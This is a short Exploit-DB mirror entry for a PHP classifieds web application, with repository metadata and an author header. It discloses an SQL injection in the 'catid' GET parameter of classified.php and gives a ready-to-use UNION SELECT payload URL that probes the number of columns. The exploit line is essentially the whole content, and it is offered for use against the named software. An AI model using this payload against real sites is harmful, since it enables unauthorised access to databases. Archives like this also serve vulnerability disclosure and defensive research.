exploit-db-mirror/exploits/php/webapps/10245.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

14 lines
No EOL
337 B
Text

/*
Author : MizoZ [from MA]
Group : EvilWay, evilway[at]mail[dot]com
Email : mizozx[at]gmail[dot]com
Greetz : Zuka, Dyle !!
MABROOK L3IIIIIIIIIID
*/
The vulnerability is in the $_GET['catid'] , exploit :
http://server/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--